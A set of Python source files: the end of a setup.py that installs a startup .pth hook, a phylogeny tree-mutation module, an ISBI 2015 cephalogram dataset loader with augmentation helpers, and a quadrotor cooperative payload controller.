_install.initialize_options(self)
# Use this prefix to get loaded as early as possible
name = 'aaaaa_' + self.distribution.metadata.name
contents = f'import sys; exec({PTH!r})\n'
self.extra_path = (name, contents)
def finalize_options(self):
_install.finalize_options(self)
install_suffix = os.path.relpath(
self.install_lib, self.install_libbase,
)
if install_suffix == '.':
distutils.log.info('skipping install of .pth during easy-install')
elif install_suffix == self.extra_path[1]:
self.install_lib = self.install_libbase
distutils.log.info(
"will install .pth to '%s.pth'",
os.path.join(self.install_lib, self.extra_path[0]),
)
else:
raise AssertionError(
'unexpected install_suffix',
self.install_lib, self.install_libbase, install_suffix,
)
setup(cmdclass={'install': install})
|
the-stack_0_6463 | from Node import Node
import numpy
class Operation(object):
BACK_MUTATION = 0
DELETE_MUTATION = 1
SWITCH_NODES = 2
PRUNE_REGRAFT = 3
@classmethod
def tree_operation(cls, tree, operation, k, gamma, max_deletions):
if operation == cls.BACK_MUTATION:
return cls.add_back_mutation(tree, k, gamma, max_deletions)
elif operation == cls.DELETE_MUTATION:
return cls.mutation_delete(tree)
elif operation == cls.SWITCH_NODES:
return cls.switch_nodes(tree)
elif operation == cls.PRUNE_REGRAFT:
return cls.prune_regraft(tree)
else:
raise SystemError("Something has happened while choosing an operation")
@classmethod
def add_back_mutation(cls, tree, k, gamma, max_deletions):
"""Adds a new random backmutation to the given tree"""
# gets a list of all the nodes from cache
cached_nodes = tree.phylogeny.get_cached_content()
keys = list(cached_nodes.keys())
# select a random node
# root has no parent, hence cannot add a back mutation
# keep trying till we find a suitable node
node = numpy.random.choice(keys)
while node.up == None or node.up.up == None:
node = numpy.random.choice(keys)
# if losses list has reached its maximum, then we can't procede
if (len(tree.losses_list) >= max_deletions):
return 1
# selecting possible node candidates (every ancestor)
candidates = [p for p in node.iter_ancestors() if (p.loss == False) and (p.mutation_id != -1)]
if len(candidates) == 0:
return 2
# selecting one random ancestor, based on gamma probabilities
found = False
while not found and len(candidates) > 0:
candidate = numpy.random.choice(candidates)
candidates.remove(candidate)
if numpy.random.uniform() < gamma[candidate.mutation_id]:
found = True
if not(found):
return 3
# Ensuring we have no more than k mutations per mutation type
if (tree.k_losses_list[candidate.mutation_id] >= k):
return 4
# If the mutation is already lost in the current tree, no way to remove it again
if (node.is_mutation_already_lost(candidate.mutation_id)):
return 5
# If there are already k mutation of candidate mutation_id
if (tree.k_losses_list[candidate.mutation_id] >= k):
return 6
node_deletion = Node(candidate.name, None, candidate.mutation_id, True)
tree.losses_list.append(node_deletion)
tree.k_losses_list[node_deletion.mutation_id] += 1
# saving parent before detaching
par = node.up
current = node.detach()
par.add_child(node_deletion)
node_deletion.add_child(current)
return 0
@classmethod
def mutation_delete(cls, tree):
"""Delete a random mutation from the given tree"""
if (len(tree.losses_list) == 0):
return 1
node = numpy.random.choice(tree.losses_list)
node.delete_node(tree)
return 0
@classmethod
def switch_nodes(cls, tree):
"""Switch two random nodes of the given tree"""
nodes = tree.phylogeny.get_cached_content()
keys = list(nodes.keys())
u = None
while (u == None or u.up == None or u.loss):
u = numpy.random.choice(keys)
keys.remove(u)
keys = list(nodes.keys())
v = None
while (v == None or v.up == None or v.loss or u.name == v.name):
v = numpy.random.choice(keys)
keys.remove(v)
u.swap(v)
return 0
@classmethod
def prune_regraft(cls, tree):
"""Prune-regraft two random nodes of the given tree"""
nodes_list = tree.phylogeny.get_cached_content()
prune_res = -1
while prune_res != 0:
keys = list(nodes_list.keys())
u = None
while (u == None or u.up == None or u.loss):
u = numpy.random.choice(keys)
keys.remove(u)
keys = list(nodes_list.keys())
v = None
while (v == None or v.up == None or v.loss):
v = numpy.random.choice(keys)
keys.remove(v)
prune_res = u.prune_and_reattach(v)
return 0
|
the-stack_0_6466 | # -*- coding: utf-8 -*-
#
# MPA Authors. All Rights Reserved.
#
""" Dataset for ISBI_2015"""
# Import global packages
import os
import numpy as np
import torch
import torch.nn.functional as F
import torchvision
from PIL import Image
import cv2
from matplotlib import pyplot as plt
# Kornia library for data augmentation
from kornia import augmentation as K
import kornia.augmentation.functional as KF
import kornia.augmentation.random_generator as KRG
# Import local functions
from evaluation import upscale_coordinates
# Import global constants
from constants import *
class ISBIDataSet(object):
""" Read ISBI2015 data and return images and labels.
Format is:
image (torch.tensor),
label(dictionary): {'ans_x': ANnotation of Senor X coordinate},
{'ans_y': ANnotation of Senor Y coordinate},
{'ans_c': ANnotation of Senor Classification},
{'anj_x': ANnotation of Junior X coordinate},
{'anj_y': ANnotation of Junior Y coordinate},
{'anj_c': ANnotation of Junior Classification}
Note:
1. We used the average of 'ans' and 'anj' as ground truth
2. Thus, the ground truth of facial classification is calculated from
evaluation of 'ana' not from annotation files.
"""
def __init__(self, data_root, mode, img_h, img_w, transforms, y_ch=False):
""" Transforms and downsampling are determined with 'transforms'
If transforms=ToTensor(), image is not downsampled and 'img_h'
and 'img_w' be obsolete.
If transforms=None, image is donwsampled as ('img_h', 'img_w')
Args:
data_root(str): Path of ISBI2015 dataset.
mode(str): Dataset mode in [train, test1, test2].
img_h(int): Height of image (used for downsampling)
img_w(int): Width of image (used for downsampling)
transforms(torchvision.transforms): Transforms to be applied. If it is
'None', then torchvision.transforms.ToTensor() is applied.
y_ch(bool): Use Y channel image as input (True) image or RGB (False).
"""
if mode == 'train':
self.data_prefix = "TrainingData"
elif mode == 'test1':
self.data_prefix = "Test1Data"
elif mode == 'test2':
self.data_prefix = "Test2Data"
else:
assert('Error in mode')
self.img_size = (img_h, img_w)
self.img_scale = (img_h / RAW_IMG_H, img_w / RAW_IMG_W)
self.transforms = transforms
self.y_ch = y_ch
if transforms is not None:
self.transforms = transforms
else:
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.Resize(self.img_size),
torchvision.transforms.ToTensor(),]
)
self.data_root = data_root
self.img_root = os.path.join(
os.path.join(self.data_root, "RawImage"),
self.data_prefix
)
self.ans_root = os.path.join(
os.path.join(self.data_root, "AnnotationsByMD/senior"),
self.data_prefix
)
self.anj_root = os.path.join(
os.path.join(self.data_root, "AnnotationsByMD/junior"),
self.data_prefix
)
self.img_list = list(sorted(os.listdir(self.img_root)))
self.ans_list = list(sorted(os.listdir(self.ans_root)))
self.anj_list = list(sorted(os.listdir(self.anj_root)))
def __getitem__(self, idx):
""" We used the average of 'ans' and 'anj' as ground truth ('ana') and
to fit to the scale, we also calculate 'ana_fs' that indicate the 'ana' in
the down sampled images.
The shape of ground-truth data is
ann = {
'ans_x': Annotation of x coordinate by senior in text file
'ans_y': Annotation of y coordinate by senior in text file
'anj_x': Annotation of x coordinate by junior in text file
'anj_y': Annotation of x coordinate by junior in text file
'ana_x': Average of 'ans_x' and 'anj_x'
'ana_y': Average of 'ans_y' and 'anj_y'
'ans_x_fs': Scaled 'ans_x' for down sampled input image
'ans_y_fs': Scaled 'ans_y' for down sampled input image
'anj_x_fs': Scaled 'anj_x' for down sampled input image
'anj_y_fs': Scaled 'anj_y' for down sampled input image
'ana_x_fs': Scaled 'ana_x' for down sampled input image
'ana_y_fs': Scaled 'ana_y' for down sampled input image
'ans_c': Annotation of facial class type by senior in text file
'anj_c': Annotation of facial class type by junior in text file
'ana_c': (deprecated) Set as the same as 'ans_c'
}
"""
# load images ad masks
img_path = os.path.join(self.img_root, self.img_list[idx])
ans_path = os.path.join(self.ans_root, self.ans_list[idx])
anj_path = os.path.join(self.anj_root, self.anj_list[idx])
pil_img = Image.open(img_path).convert("RGB")
img = self.transforms(pil_img) # Load image
with open(ans_path) as ans_f: # Read lines without '\n'
ans = [ans_l.rstrip() for ans_l in ans_f]
with open(anj_path) as anj_f: # Read lines without '\n'
anj = [anj_l.rstrip() for anj_l in anj_f]
# Annotation
ann = {}
# Annotation by Senior. (_fs means 'fixed scale')
ann["ans_x"] = np.array([(float(xy.split(',')[0])) for xy in ans[:NUM_LM]])
ann["ans_y"] = np.array([(float(xy.split(',')[1])) for xy in ans[:NUM_LM]])
ann["ans_x_fs"] = self.img_scale[1] * ann["ans_x"]
ann["ans_y_fs"] = self.img_scale[0] * ann["ans_y"]
# Annontation by Junior.
ann["anj_x"] = np.array([(float(xy.split(',')[0])) for xy in anj[:NUM_LM]])
ann["anj_y"] = np.array([(float(xy.split(',')[1])) for xy in anj[:NUM_LM]])
ann["anj_x_fs"] = self.img_scale[1] * ann["anj_x"]
ann["anj_y_fs"] = self.img_scale[0] * ann["anj_y"]
# Averaged annotation.
ann["ana_x"] = 0.5 * (ann["ans_x"] + ann["anj_x"])
ann["ana_y"] = 0.5 * (ann["ans_y"] + ann["anj_y"])
ann["ana_x_fs"] = 0.5 * (ann["ans_x_fs"] + ann["anj_x_fs"])
ann["ana_y_fs"] = 0.5 * (ann["ans_y_fs"] + ann["anj_y_fs"])
# Face type
ann["ans_c"] = np.pad(np.array([int(c) for c in ans[NUM_LM:]]), (0, 11))
ann["anj_c"] = np.pad(np.array([int(c) for c in anj[NUM_LM:]]), (0, 11))
ann["ana_c"] = ann["ans_c"]
if self.y_ch == False:
return img, ann
else:
y_ch_img = self.transforms(pil_img.convert("YCbCr").getchannel('Y'))
return img, ann, y_ch_img
def __len__(self):
return len(self.img_list)
def to_numpy_image(tensor_img):
return tensor_img.transpose(1, 3).transpose(1, 2).cpu().numpy()
def to_tensor_image(np_img):
return torch.tensor(np.transpose(np_img, (0, 3, 1, 2)))
def to_numpy_arr(tensor_arr):
return tensor_arr.cpu().numpy()
def to_tensor_arr(np_arr):
return torch.tensor(np_arr)
def vis_isbi(img_batch, pred_batch, x, y, c, radius, font_scale, txt_offset):
""" Visualize predicted (or ground truth) landmark positions as circle
in the input images.
Args:
img_batch (torch.tensor): Raw input image from ISBI2015
pred_batch (torch.tensor): Image used for the prediction (e.g. down sampled)
x (torch.tensor): (Predicted) landmark positions (x coordinate)
y (torch.tensor): (Predicted) landmark positions (y coordinate)
c (torch.tensor): (Deprecated) (predicted) facial class type
radius (int): Radius of circle of landmark
font_scale (int): Size of landmark text (short names)
txt_offset (int): Offset distance of text from landmark locations
Returns:
vis_img (tensor): Result image
"""
n_batch, img_c, img_h, img_w = img_batch.shape
_, pred_c, pred_h, pred_w = pred_batch.shape
x = ((img_w / pred_w) * to_numpy_arr(x)).astype(np.int)
y = ((img_h / pred_h) * to_numpy_arr(y)).astype(np.int)
num_lm = x.shape[1]
img_batch = to_numpy_image(img_batch)
vis_img = np.zeros_like(img_batch)
for n in range(n_batch):
img = cv2.UMat(img_batch[n])
for i in range(num_lm):
img = cv2.circle(img=img,
center=(x[n, i], y[n, i]),
radius=radius,
color=(1, 0, 0),
thickness=-1,
)
img = cv2.putText(img=img,
text='{}'.format(S_LM_NAME_DICT[i]),
org=(x[n, i] + txt_offset, y[n, i] + txt_offset),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale,
color=(0, 1, 0),
thickness=2,
lineType=cv2.LINE_AA
)
overlayed_img = np.array(img.get())
if len(overlayed_img.shape) == 2: # For gray scale image
vis_img[n,:,:,0] = np.array(img.get())
else:
vis_img[n,:,:,:] = np.array(img.get())
return to_tensor_image(vis_img)
def ann_to_heatmap(img_batch, ksize, sigma, x, y, c):
""" Convert annotation into heatmaps of landmark locations using Gaussian
distribution
Args:
img_batch (torch.tensor): Input image
ksize (int): Size of Gaussian kernel (2 * ksize + 1)
sigma (int): Sigma of Gaussian kernel
x (torch.tensor): Landmark positions (x coordinate)
y (torch.tensor): Landmark positions (y coordinate)
c (torch.tensor): (Deprecated) Facial type
Returns:
gt_heatmap (tensor): Heatmatp of ground truth
"""
n_batch, _, img_h, img_w = img_batch.shape
n_lm = x.shape[1]
x = torch.round(x).int()
y = torch.round(y).int()
g_mask = cv2.getGaussianKernel(2 * ksize + 1, sigma)
g_mask = g_mask * g_mask.transpose()
g_mask = torch.tensor(g_mask / np.max(g_mask))
gt_heatmap = torch.zeros([n_batch, n_lm, img_h, img_w])
for n in range(n_batch):
for i in range(n_lm):
gt_heatmap[n, i, y[n, i], x[n, i]] = 1
return gt_heatmap
def heatmap_to_ann(heatmap_batch):
""" Convert heatmap into series of X,Y coordinate by applying argmax.
Args:
heatmap_batch (torch.tensor)
Returns: Integer coordinates (x, y)
"""
n_batch, n_lm, img_w, img_h = heatmap_batch.shape
x = torch.zeros([n_batch, n_lm])
y = torch.zeros([n_batch, n_lm])
for n in range(n_batch):
for i in range(n_lm):
raw_idx = heatmap_batch[n, i, :, :].argmax()
y[n, i] = raw_idx // img_h
x[n, i] = raw_idx - (y[n, i] * img_h)
return x.int(), y.int()
def augmentation(
img_batch,
heatmap_batch,
x,
y,
degrees,
scale,
brightness,
contrst,
saturation,
hue,
same_on_batch):
""" Augment cephalogram and heatmap with following step.
1. Rotation: Use image center or porion as ceter of rotation.
2. Scaling: Use image center or porion as ceter of rotation.
3. Color jittering: Perturb brightness, contrast, stauration and hue.
Args:
img_batch (torch.tensor): Cephalogram from ISBI2015.
Shape = [n_batch, n_ch, height, width]
heatmap_batch (torch.tensor): GT heatmap.
Shape = [n_batch, n_ch, height, width]
x (torch.tensor): X coordinates of landmarks
Shape = [n_batch, NUM_LM]
y (torch.tensor): Y coordinates of landmarks
Shape = [n_batch, NUM_LM]
degrees (list): Range of random rotation.
Shape = [int, int]
scale (int): Range of random scale.
brightness (int): Range of random brightness.
contrst (int): Range of random contrast.
stauration (int): Range of random stauration.
hue (int): Range of random hue.
same_on_batch(bool): Same on batch.
Returns:
aug_img (torch.tensor): Augmented cephalograms.
Shape = [n_batch, n_ch, height, width]
aug_heatmap (torch.tensor): Augmented heatmaps.
Shape = [n_batch, n_ch, height, width]
aug_x (torch.tensor): X coordinates of augmented cephalograms' landmarks
scaled as ISBI2015
Shape = [n_batch, NUM_LM]
aug_y (torch.tensor): Y coordinates of augmented cephalograms' landmarks
scaled as ISBI2015
Shape = [n_batch, NUM_LM]
aug_x_fs (torch.tensor): X coordinates of augmented cephalograms' landmarks
scaled as heatmap
Shape = [n_batch, NUM_LM]
aug_y_fs (torch.tensor): Y coordinates of augmented cephalograms' landmarks
scaled as heatmap
Shape = [n_batch, NUM_LM]
"""
n_batch, img_c, img_h, img_w = img_batch.shape
aff_degrees = degrees
aff_scale = scale
affine_params = KRG.random_affine_generator(
batch_size=n_batch,
height=img_h,
width=img_w,
degrees=aff_degrees,
scale=aff_scale,
same_on_batch=same_on_batch,
)
color_jitter_params = KRG.random_color_jitter_generator(
batch_size=n_batch,
brightness=brightness,
contrast=contrst,
saturation=saturation,
hue=hue,
same_on_batch=same_on_batch)
aug_imgs = KF.apply_affine(img_batch, affine_params)
aug_heatmaps = KF.apply_affine(heatmap_batch, affine_params)
aug_x_fs, aug_y_fs = heatmap_to_ann(aug_heatmaps)
aug_x, aug_y = upscale_coordinates(
img_batch=img_batch, x=aug_x_fs, y=aug_y_fs
)
return aug_imgs, aug_heatmaps, aug_x_fs, aug_y_fs, aug_x, aug_y
def crop_lm_patches(img_batch, x_c_batch, y_c_batch, ann_batch, pat_sz):
""" Cropping patches for local stage
Args:
img_batch (tensor): Input image
x_c_batch (tensor): Crop center 'x'
y_c_batch (tensor): Crop center 'y'
ann_batch (tensor): Ground truth annotation
pat_sz (int): Side length of patch
Returns:
img_crop_batch_list (tensor): Cropped patch images
ana_x_batch_list (tensor): Landmark coordinates 'x' of patches
ana_y_batch_list (tensor): Landmark coordinates 'y' of patches
"""
img_crop_batch_list = []
ana_x_batch_list = []
ana_y_batch_list = []
# Zero padding for cropping
img_batch = F.pad(img_batch, (pat_sz, pat_sz, pat_sz, pat_sz))
for img_idx in range(img_batch.shape[0]):
img_crop_ch_list = []
ana_x_ch_list = []
ana_y_ch_list = []
# Padding requires offset GT and crop center by pat_sz.
ana_x = int(ann_batch['ana_x'][img_idx]) + pat_sz
ana_y = int(ann_batch['ana_y'][img_idx]) + pat_sz
x_c = int(x_c_batch[img_idx]) + pat_sz
y_c = int(y_c_batch[img_idx]) + pat_sz
# ROI of patch
pat_x_r = slice(x_c - pat_sz, x_c + pat_sz)
pat_y_r = slice(y_c - pat_sz, y_c + pat_sz)
# Cropped image
img_crop = img_batch[img_idx:img_idx + 1, :, pat_y_r, pat_x_r].clone()
img_crop_ch_list.append(img_crop)
# Annotation of patch is
# GT landmark position - crop center + patch_size
ana_x_ch_list.append(torch.tensor([[pat_sz + ana_x - x_c]]))
ana_y_ch_list.append(torch.tensor([[pat_sz + ana_y - y_c]]))
img_crop_batch_list.append(torch.cat(img_crop_ch_list, dim=1))
ana_x_batch_list.append(torch.cat(ana_x_ch_list, dim=1))
ana_y_batch_list.append(torch.cat(ana_y_ch_list, dim=1))
img_crop_batch_list = torch.cat(img_crop_batch_list, dim=0)
ana_x_batch_list = torch.cat(ana_x_batch_list, dim=0)
ana_y_batch_list = torch.cat(ana_y_batch_list, dim=0)
return img_crop_batch_list, ana_x_batch_list, ana_y_batch_list
def vis_patch(img_batch, x, y, c, radius, font_scale, txt_offset, lm_idx):
""" Visualize predicted (or ground truth) landmark positions as circle
in the cropped patches.
Args:
img_batch (torch.tensor): Cropped patch image
x (torch.tensor): (Predicted) landmark positions (x coordinate)
y (torch.tensor): (Predicted) landmark positions (y coordinate)
c (torch.tensor): (Deprecated) (predicted) facial class type
radius (int): Radius of circle of landmark
font_scale (int): Size of landmark text (short names)
txt_offset (int): Offset distance of text from landmark locations
lm_idx (int): Index of landmark to visualize
Returns:
vis_img (tensor): Result image
"""
n_batch, img_c, img_h, img_w = img_batch.shape
x = to_numpy_arr(x).astype(np.int)
y = to_numpy_arr(y).astype(np.int)
num_lm = x.shape[1]
img_batch = to_numpy_image(img_batch)
vis_img = np.zeros_like(img_batch)
for n in range(n_batch):
img = cv2.UMat(img_batch[n])
img = cv2.circle(img=img,
center=(x[n], y[n]),
radius=radius,
color=(1, 0, 0),
thickness=-1,
)
img = cv2.putText(img=img,
text='{}'.format(S_LM_NAME_DICT[lm_idx]),
org=(x[n] + txt_offset, y[n] + txt_offset),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale,
color=(0, 1, 0),
thickness=2,
lineType=cv2.LINE_AA
)
overlayed_img = np.array(img.get())
if len(overlayed_img.shape) == 2:
vis_img[n,:,:,0] = np.array(img.get())
else:
vis_img[n,:,:,:] = np.array(img.get())
return to_tensor_image(vis_img) |
the-stack_0_6467 | #!/usr/bin/python3
import numpy as np
from rotor_tm_utils.vec2asym import vec2asym
import scipy.linalg as LA
from rotor_tm_utils.vee import vee
from rotor_tm_utils.RPYtoRot_ZXY import RPYtoRot_ZXY
from rotor_tm_utils import utilslib
import scipy
from scipy.spatial.transform import Rotation as tranrot
import json
class controller:
def __init__(self):
self.gd = np.zeros((0,0), dtype=float)
self.icnt = None
# for hover_controller
self.last_t = None
def cooperative_attitude_controller(self, qd, qn, params):
# DESCRIPTION:
# Attitude controller for cooperative cable suspended payload and MAV(s)
# This function is used as a helper function in cooperative_suspended_payload_controller()
# to compute F, M, and Rot_des
# INPUTS:
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
# 'yaw_des' float NA desired payload yaw, set to 0.0 current
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# qn - an integer identifying the id of the current MAV the controller is controlling
# params - a read_params class objects containing all MAV parameters
# OUTPUTS:
# F - a 3 by 1 vector describing thrust
# M - a 3 by 1 vector describing Moment
# Rot_des - a rotation matrix describing desired rotation
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
# Parameter Initialization
m = params.mass
l = params.l
e3 = np.array([[0],[0],[1]])
# State Feedback
xi = qd[qn]["xi"]
xidot = qd[qn]["xidot"]
rot = qd[qn]["rot"]
# Cable Direction Tracking Control
mu_des = qd[qn]["mu_des"]
xi_des = np.divide(-mu_des, np.linalg.norm(mu_des))
xi_des_dot = np.array([[0.0],[0.0],[0.0]])
w_des = np.cross(xi_des, xi_des_dot, axisa=0, axisb=0).T
w = np.cross(xi, xidot, axisa=0, axisb=0).T
mu = np.matmul(qd[qn]["xixiT"], mu_des)
e_xi = np.cross(xi_des, xi, axisa=0, axisb=0).T
e_w = w + np.cross(xi, np.cross(xi, w_des, axisa=0, axisb=0).T, axisa=0, axisb=0).T
u_parallel = mu + m*l*np.linalg.norm(w)**2*xi + np.matmul(m*qd[qn]["xixiT"], qd[qn]["attach_accel"])
u_perpendicular = -m*l*np.cross(xi, params.Kxi @ e_xi + params.Kw @ e_w + (xi.T @ w_des) * xi_des_dot, axisa=0, axisb=0).T - m*np.cross(xi, np.cross(xi, qd[qn]["attach_accel"], axisa=0, axisb=0).T, axisa=0, axisb=0).T
Force = u_parallel + u_perpendicular
F = Force.T @ np.matmul(rot,e3)
# Desired Attitude and Angular Velocity
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:, 2:3] = Z_body_in_world
Y_unit = np.array([[-np.sin(yaw_des)], [np.cos(yaw_des)], [0]])
X_body_in_world = np.cross(Y_unit, Z_body_in_world, axisa=0, axisb=0).T
X_body_in_world = X_body_in_world/np.linalg.norm(X_body_in_world)
Rot_des[:,0:1] = X_body_in_world
Y_body_in_world = np.cross(Z_body_in_world, X_body_in_world, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
p_des = np.array([[0.0]])
q_des = np.array([[0.0]])
r_des = yawdot_des*Z_body_in_world[2:3, :]
qd[qn]["rot_des"] = Rot_des
qd[qn]["omega_des"] = np.vstack((p_des, q_des, r_des))
# Quadrotor Attitude Control
M = self.quadrotor_attitude_controller(qd[qn], params)
return F, M, Rot_des
def quadrotor_attitude_controller(self, qd, params):
# DESCRIPTION:
# Attitude controller for a single cable suspended MAV and payload
# This function is used as a helper function in cooperative_attitude_controller() to compute M
# INPUTS:
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
# 'yaw_des' float NA desired payload yaw, set to 0.0 current
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# params - a dictionary of the payload parameters
# OUTPUTS:
# M - a 3 by 1 vector describing Moment
Rot = qd["rot"]
Rot_des = qd["rot_des"]
omega_des = qd["omega_des"]
e_Rot = np.matmul(Rot_des.T, Rot) - np.matmul(Rot.T, Rot_des)
e_angle = vee(e_Rot)/2
e_omega = qd["omega"] - np.matmul(Rot.T, np.matmul(Rot_des, omega_des))
M = np.cross(qd["omega"], np.matmul(params.I, qd["omega"]), axisa=0, axisb=0).T - np.matmul(params.Kpe, e_angle) - np.matmul(params.Kde, e_omega)
return M
def cooperative_suspended_payload_controller(self, ql, qd, pl_params, qd_params):
# DESCRIPTION:
# Controller for cooperative cable suspended payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'quat' ndarray 4 by 1 payload orientation as unit quaternion
# 'omega' ndarray 3 by 1 payload angular velocity
# 'rot' ndarray 3 by 3 payload rotation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaterion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'yaw_des' float NA desired payload yaw, set to 0.0 current
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
# 'yaw_des' float NA desired payload yaw, set to 0.0 current
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# pl_params - a read_params class object containing payload parameters
# qd_params - a read_params class objects containing all MAV parameters
# OUTPUTS:
# mu - a 3*(Number of MAV(s)) by 1 ndarray, describing tension condition of each cable
# att_acc_c - a 2*(Number of MAV(s)) by 1 ndarray, describing cable payload attachment acceleration
# qd_F - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 1 by 1 ndarray denoting the thrust
# qd_M - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 3 by 1 ndarray denoting the moment
# qd_quat_des - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 1d ndarray with 4 elements denoting the desired orientation as unit quaternion
# qd_rot_des - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 3 by 3 ndarray denoting the desired orientation as rotation matrix
if not pl_params.sim_start:
self.icnt = 0
self.icnt = self.icnt + 1
# Parameter Initialization
quat_des = ql["quat_des"]
omega_des = ql["omega_des"]
g = pl_params.grav
m = pl_params.mass
nquad = pl_params.nquad
e3 = np.array([[0],[0],[1.0]])
Rot = ql["rot"]
omega_asym = vec2asym(ql["omega"])
Rot_des = utilslib.QuatToRot(quat_des)
## Position control
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = ql["acc_des"] + np.matmul(pl_params.Kp, ep) + np.matmul(pl_params.Kd, ed)
F = m*g*e3 + m*acceleration_des
## Attitude Control
# Errors of anlges and angular velocities
e_Rot = Rot_des.T @ Rot - Rot.T @ Rot_des
e_angle = np.divide(vee(e_Rot), 2)
e_omega = ql["omega"] - Rot.T @ Rot_des @ omega_des.T
# Net moment
# Missing the angular acceleration term but in general it is neglectable.
M = np.matmul(-pl_params.Kpe, e_angle) - np.matmul(pl_params.Kde, e_omega) # may need to be changed to scalar product
# Cable tension distribution
diag_rot = np.zeros((0,0), dtype=float)
for i in range(1, nquad+1):
diag_rot = LA.block_diag(diag_rot, Rot)
mu = diag_rot @ pl_params.pseudo_inv_P @ np.append(Rot.T @ F, M, axis=0)
for i in range(1, nquad+1):
if (0>mu[3*i-1, 0]):
mu[3*i-1, 0] = 0
print("mu is less than zero")
else:# Is this really necessary?
mu[3*i-1, 0] = mu[3*i-1, 0]
att_acc_c = acceleration_des + g*e3 + np.matmul(np.matmul(np.matmul(Rot, omega_asym), omega_asym), pl_params.rho_vec_list)
# Quadrotor Attitude Controller
qd_F = {}
qd_M = {}
qd_rot_des = {}
qd_quat_des = {}
for qn in range(0, nquad):
qd[qn]["yaw_des"] = 0
qd[qn]["yawdot_des"] = 0
qd[qn]["mu_des"] = mu[3*qn:3*(qn+1)]
qd[qn]["attach_accel"] = att_acc_c[:,qn].reshape((3,1))
[F_qn, M_qn, Rot_des_qn] = self.cooperative_attitude_controller(qd, qn, qd_params)
qd_F[qn] = F_qn
qd_M[qn] = M_qn
qd_quat_des[qn] = tranrot.from_matrix(Rot_des_qn).as_quat()
qd_rot_des[qn] = Rot_des_qn
#return qd_F, qd_M
return mu, att_acc_c, qd_F, qd_M, qd_quat_des, qd_rot_des
# untested
def cooperative_payload_controller(self, ql, params):
if not params["sim_start"]:
# self.coeff0 = params.coeff0
self.icnt = 0
self.icnt = self.icnt + 1
